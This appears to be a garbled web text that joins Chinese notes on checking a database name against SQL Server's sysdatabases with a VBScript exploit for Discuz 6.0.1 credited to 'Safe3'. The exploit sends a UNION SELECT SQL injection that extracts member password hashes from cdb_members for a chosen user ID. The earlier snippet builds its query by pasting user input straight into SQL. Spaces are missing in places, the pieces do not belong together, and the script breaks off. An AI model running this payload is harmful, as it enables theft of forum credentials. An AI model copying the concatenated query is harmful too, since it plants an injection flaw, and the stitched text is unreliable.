dbName是用户给出的数据库名;查询系统表sysdatabases,看用户给出的数据库名dbName是否已经存在,如果此数据库存在,就需要更换一个数据库名,像设备名一样,数据库名也是唯一的
sql="select*fromsysdatabases
wherename='"&dbName&"'"
Setrs=conn.Execute(sql)'下面代码略
----3)得到PHYNAME物理名
Dim strUrl,strSite,strPath,strUid
showB()
Set Args=Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,passwordfromcdb_memberswhereuid=" & strUid &"*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====